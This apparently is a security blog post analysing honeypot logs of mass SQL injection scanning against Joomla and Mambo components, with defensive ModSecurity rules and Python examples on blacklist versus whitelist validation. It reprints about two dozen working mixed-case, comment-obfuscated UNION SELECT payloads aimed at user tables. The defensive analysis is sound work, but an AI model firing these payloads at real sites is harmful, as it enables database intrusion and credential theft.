[Honeypot Alert] SQL Injection Scanning Update - Filter Evasions Detected

As we reported in the previous [Honeypot Alert] WordPress/Joomla/Mambo SQL Injection Scanning Detected alert, we have identified an increase in mass SQL Injection scanning targeting various community components.

While this scanning is still ongoing, we have identified a slight variation in the attack methodology used. Here are examples from today's web server logs:

GET /index.php?option=com_acprojects&page=7&lang=de&Itemid=null and 1=2%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_acprojects&page=7&lang=de&Itemid=null and 1=2%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2F%2A%2A%2FfRoM%2F%2A%2A%2Fmos_users-- HTTP/1.1
GET /index.php?option=com_acstartseite&lang=de&Itemid=null and 1=2%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2F%2A%2A%2FfRoM%2F%2A%2A%2Fmos_users-- HTTP/1.1
GET /index.php?option=com_acteammember&Itemid=121&lang=en&id=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C3%2C4%2C5%2C0x33633273366962%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_agency&task=view&aid=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_bidding&id=-200%2F%2A%2A%2FuNiOn%2F%2A%2A%2FALL%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_blog&task=viewdetails&id=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_book&controller=listtour&task=showTour&cid[]=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2Fall%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_comp&task=view&cid=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_departments&id=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_gigfe&task=style&styletype=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_hezacontent&view=item&id=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2Fall%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C3%2C4%2C5%2C6%2C0x33633273366962%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_include&lang=en_GB&Itemid=50&ID_NLE=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_jeeventcalendar&template=system&view=event&Itemid=155&event_id=-1%22%2F%2A%2A%2FuNiOn%2F%2A%2A%2FALL%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_mambads&Itemid=39&func=view&cacat=33&casb=1%2F%2A%2A%2FuNiOn%2F%2A%2A%2Fall%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C0x33633273366962%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2F%2A%2A%2FfRoM%2F%2A%2A%2Fmos_users-- HTTP/1.1
GET /index.php?option=com_nfnaddressbook&Itemid=61&action=viewrecord&record_id=-4%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_party&view=party&task=details&id=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_personal&pid=56&id=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_products&op=category_details&intCategoryId=-222%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_products&op=category_details&intCategoryId=-222%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fmos_users-- HTTP/1.1
GET /index.php?option=com_route&routing&kid=-35022%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_science&view=science&id=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_start&task=main&mitID=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_teacher&view=teacher&id=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_yanc&Itemid=75&listid=-2%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C2%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1

Can you spot the difference in the SQL Injection payloads?

Mixed-Case Attack Payloads

The attackers are now using mixed case in the SQL commands.

GET /index.php?option=com_acprojects&page=7&lang=de&Itemid=null and 1=2%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1

The purpose of mixing the case of these attack payloads is to evade poorly constructed input validation blacklist filters.

Blacklist Filtering

Blacklist filtering is often used as a part of input validation in order to easily block known bad payloads. Here is a common blacklist filtering question posed to the community about preventing SQL Injection:

[Screenshot: the blacklist filtering question as posted]

While this person has correctly specified a number of key SQL functions used in SQL Injection attacks, the error of omission in this case is that the regular expression assumes the payloads will be in lowercase. As we have seen in the honeypot log examples above, attackers can and will use mixed case, as it is functionally equivalent code to the database.

When writing blacklist filters, care should be taken to normalize data to prevent this type of evasion. In the OWASP ModSecurity Core Rule Set, we use two different techniques to handle mixed-case evasions:

Transformation Functions

Many rules use the "t:lowercase" transformation function to change all payloads to lowercase before applying the operator check.

SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pm select show top distinct from dual where group by order having limit offset union rownum as (case" "phase:2,id:'981300',t:none,t:urlDecodeUni,t:removeCommentsChar,t:lowercase,nolog,pass,nolog,setvar:'tx.sqli_select_statement=%{tx.sqli_select_statement} %{matched_var}'"

While this process works, it does incur a performance hit in latency.

Ignore Case RegEx Flags

The other option is to modify the PCRE regular expression rule itself and apply the "IGNORE_CASE" modifier flag. In ModSecurity, this is accomplished by using one of the following syntaxes:

(?i)REGEX

  • "(?i)(var[^=]+=\s*unescape\s*;)"

(?i:REGEX)

  • "(?i:<\s*IFRAME\s*?[^>]*?src=\"javascript:)"

If you are using any blacklist filtering as part of input validation, I highly suggest you verify how you are handling mixed-case payloads.
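The following added example (not part of the original post or of the Core Rule Set) runs the Itemid value from the first honeypot request through both approaches. The lowercase-only blacklist is a hypothetical stand-in for the filter in the question, and normalize() is a simplified emulation of the three transformations in rule 981300, not ModSecurity's implementation.

```python
import re
from urllib.parse import unquote

# Itemid value from the first honeypot request above, still URL-encoded.
LOGGED_ARG = ("null and 1=2%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C"
              "0x33633273366962%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C"
              "15%2C16%2C17%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--")
BENIGN_ARG = "121"  # constructed negative control

# Hypothetical lowercase-only blacklist (assumption: stands in for the filter in the question).
NAIVE = re.compile(r"\b(union|select|insert|update|delete|drop)\b")
# The same pattern with the inline ignore-case flag, "(?i)REGEX".
IGNORE_CASE = re.compile(r"(?i)\b(union|select|insert|update|delete|drop)\b")
# Subset of the @pm phrase list from rule 981300.
PHRASES = ("select", "from", "union", "where", "having")


def normalize(value):
    """Simplified stand-in for t:urlDecodeUni, t:removeCommentsChar, t:lowercase."""
    value = unquote(value)
    for token in ("/*", "*/", "--", "#"):
        value = value.replace(token, "")
    return value.lower()


def regex_blocks(pattern, value, decode=True):
    """True if the blacklist regex fires on the (optionally URL-decoded) value."""
    return pattern.search(unquote(value) if decode else value) is not None


def phrase_hits(value):
    """Substring match on normalized data, as a phrase matcher does (no word boundaries)."""
    norm = normalize(value)
    return [p for p in PHRASES if p in norm]


if __name__ == "__main__":
    print("lowercase-only regex:", regex_blocks(NAIVE, LOGGED_ARG))
    print("(?i) regex, decoded:", regex_blocks(IGNORE_CASE, LOGGED_ARG))
    print("(?i) regex, raw:", regex_blocks(IGNORE_CASE, LOGGED_ARG, decode=False))
    print("(?i) regex after comment removal:", regex_blocks(IGNORE_CASE, normalize(LOGGED_ARG)))
    print("phrase match after normalization:", phrase_hits(LOGGED_ARG))
    print("benign:", regex_blocks(IGNORE_CASE, BENIGN_ARG), phrase_hits(BENIGN_ARG))
```

Note that the word-boundary regex stops matching once the comment characters are stripped, because the keywords end up glued to their neighbours; normalized data needs a substring-style match, and a boundary-anchored regex needs the comments left in place.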

SQL Injection Prevention

While blacklist filtering has its uses, it should not be used as the only method of preventing any attacks. Whitelist filtering of input is highly recommended in order to ensure that data is of the correct size, character set and format.
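As an added illustration of whitelist filtering (not code from the original post), the validator below checks each parameter of a request against an allow-list that fixes its size, character set and format. The parameter names are taken from the logged requests; the patterns themselves are assumptions chosen for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Hypothetical allow-list: every accepted parameter has a fixed character set,
# format and maximum length. Anything not listed here is rejected outright.
ALLOWED = {
    "option": re.compile(r"com_[a-z0-9_]{1,40}"),
    "page":   re.compile(r"[0-9]{1,4}"),
    "lang":   re.compile(r"[a-z]{2}(_[A-Z]{2})?"),
    "Itemid": re.compile(r"[0-9]{1,6}"),
}

# First request from the honeypot log above.
LOGGED = ("/index.php?option=com_acprojects&page=7&lang=de&Itemid=null and 1=2"
          "%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962"
          "%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17"
          "%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--")
# Constructed legitimate request for the same component.
BENIGN = "/index.php?option=com_acprojects&page=7&lang=de&Itemid=121"


def validate(request_target):
    """Return (ok, rejected); rejected lists parameters that fail the allow-list."""
    rejected = []
    query = urlsplit(request_target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        rule = ALLOWED.get(name)
        # fullmatch: the whole decoded value must fit, whatever its case or encoding.
        if rule is None or rule.fullmatch(value) is None:
            rejected.append(name)
    return (not rejected, rejected)


if __name__ == "__main__":
    print(validate(LOGGED))
    print(validate(BENIGN))
```

Because the check describes what valid input looks like, the mixed-case and comment tricks are irrelevant to it: the Itemid value is rejected simply because it is not a short run of digits.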

For SQL Injection, it is recommended that all developers review the OWASP SQL Injection Prevention Cheatsheet, which has excellent guidance on properly constructing SQL queries.
